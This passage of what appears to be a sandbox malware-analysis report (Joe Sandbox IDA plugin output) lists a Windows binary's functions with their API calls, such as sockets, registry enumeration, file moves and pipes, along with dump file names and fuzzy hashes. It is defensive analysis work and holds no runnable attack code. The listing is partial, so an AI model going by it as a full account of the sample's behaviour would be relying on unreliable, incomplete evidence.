                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0101B79F
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0101B7DE
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0101B7FF
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00FE5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00FE57E3
                                                                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00FE585E
                                                                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00FE5879
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00FE589F
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,00FE5F16,00000000,?,?,?,?,?,?,?,?,?,00FE5F16,?), ref: 00FE58BE
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,00FE5F16,00000000,?,?,?,?,?,?,?,?,?,00FE5F16,?), ref: 00FE58F7
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00FD30BB
                                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00FD30C3
                                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00FD3151
                                                                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00FD317C
                                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00FD31D1
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01033AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 01033AD7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01033AAB: _wcslen.LIBCMT ref: 01033AF8
                                                                                                                                                                                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 01031B6F
                                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 01031B7E
                                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 01031C26
                                                                                                                                                                                                                                                                                                        • closesocket.WSOCK32(00000000), ref: 01031C56
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0101D7CD,?), ref: 0101E714
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0101D7CD,?), ref: 0101E72D
                                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0101D7F0
                                                                                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0101D82A
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101D8B0
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101D8C6
                                                                                                                                                                                                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 0101D90C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                                                                                                                                                        • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 010438B8
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 010438EB
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 01043920
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 01043952
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0104397C
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0104398D
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 010439A7
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 010180D0
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 010180F6
                                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 010180F9
                                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 01018117
                                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 01018120
                                                                                                                                                                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 01018145
                                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 01018153
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 010181A9
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 010181CF
                                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 010181D2
                                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32 ref: 010181F3
                                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32 ref: 010181FC
                                                                                                                                                                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 01018216
                                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 01018224
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 01020F6D
                                                                                                                                                                                                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01020FA8
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                        • String ID: nul
                                                                                                                                                                                                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 01020E99
                                                                                                                                                                                                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01020ED5
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                        • String ID: nul
                                                                                                                                                                                                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FB78B1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7873: GetStockObject.GDI32(00000011), ref: 00FB78C5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB78CF
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01044BB0
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 01044BBD
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 01044BC8
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01044BD7
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01044BE3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                                        • Opcode ID: 74caee7ddab1903a53f8f637beccf75cf02186d9108e3ad8c6ddffc735f612c6
                                                                                                                                                                                                                                                                                                        • Instruction ID: b82f720331fc4802b6f70272c3a26416db05012dd8ed2aabe2617aa886b722c1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 74caee7ddab1903a53f8f637beccf75cf02186d9108e3ad8c6ddffc735f612c6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F1193B1550219BFEF119EA5CC85EEB7F9DEF08758F018111B648E6050C6769C21DBA4
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FEDB23: _free.LIBCMT ref: 00FEDB4C
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDBAD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00FEDB51,01081DC4,00000000,01081DC4,00000000,?,00FEDB78,01081DC4,00000007,01081DC4,?,00FEDF75,01081DC4), ref: 00FE2D4E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE2D38: GetLastError.KERNEL32(01081DC4,?,00FEDB51,01081DC4,00000000,01081DC4,00000000,?,00FEDB78,01081DC4,00000007,01081DC4,?,00FEDF75,01081DC4,01081DC4), ref: 00FE2D60
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDBB8
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDBC3
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDC17
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDC22
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDC2D
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDC38
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                                        • Instruction ID: b07c097780ce36f49b177997ca01a4ef1b64b965cd1422288e824d941b3a3de2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90116372541B88BAD530BBB2CC47FCBB7DC9F84700F410C19B299AA552EB7DB514A750
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0101E328
                                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 0101E32F
                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0101E345
                                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 0101E34C
                                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0101E390
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 0101E36D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                                        • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                                                        • Opcode ID: 08694d72f2971b727f2bf367ce6f7d1af10bbfbb100e78b5e8d5decbbdb673a4
                                                                                                                                                                                                                                                                                                        • Instruction ID: e12f7a4f0748898b6b1f23a6587d09b43cad3ea97409970de6d25d898237c329
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08694d72f2971b727f2bf367ce6f7d1af10bbfbb100e78b5e8d5decbbdb673a4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 000162F6900208BFE72197E4DDC9EEB776CD708300F004595BB85E6045EA789E848B75
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 01021322
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000000,?), ref: 01021334
                                                                                                                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000,000001F6), ref: 01021342
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 01021350
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0102135F
                                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0102136F
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000000), ref: 01021376
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0103281D
                                                                                                                                                                                                                                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0103283E
                                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 0103284F
                                                                                                                                                                                                                                                                                                        • htons.WSOCK32(?,?,?,?,?), ref: 01032938
                                                                                                                                                                                                                                                                                                        • inet_ntoa.WSOCK32(?), ref: 010328E9
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101433E: _strlen.LIBCMT ref: 01014348
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01033C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0102F669), ref: 01033C9D
                                                                                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 01032992
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 00FE042A
                                                                                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE0446
                                                                                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 00FE045D
                                                                                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE047B
                                                                                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 00FE0492
                                                                                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE04B0
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00FD8649,00FD8649,?,?,?,00FE67C2,00000001,00000001,8BE85006), ref: 00FE65CB
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00FE67C2,00000001,00000001,8BE85006,?,?,?), ref: 00FE6651
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00FE674B
                                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00FE6758
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FD6A79,?,0000015D,?,?,?,?,00FD85B0,000000FF,00000000,?,?), ref: 00FE3BC5
                                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00FE6761
                                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00FE6786
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0103C10E,?,?), ref: 0103D415
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D451
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D4C8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D4FE
                                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103C72A
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0103C785
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0103C7CA
                                                                                                                                                                                                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0103C7F9
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0103C853
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0103C85F
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: bbba369a66c7f87c1bc61f1ebe640df21efcddc56741246ff9948327de8a0c1a
                                                                                                                                                                                                                                                                                                        • Instruction ID: b3c73ce7eb64b29e7271b80e3473841f1cf13f2dbac5388a86d62f477bb35d87
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bbba369a66c7f87c1bc61f1ebe640df21efcddc56741246ff9948327de8a0c1a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D581B174208241AFE715DF24C984E6ABBE9FF84308F04849DF5959B292CB36ED06CF91
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(00000035), ref: 010100A9
                                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 01010150
                                                                                                                                                                                                                                                                                                        • VariantCopy.OLEAUT32(01010354,00000000), ref: 01010179
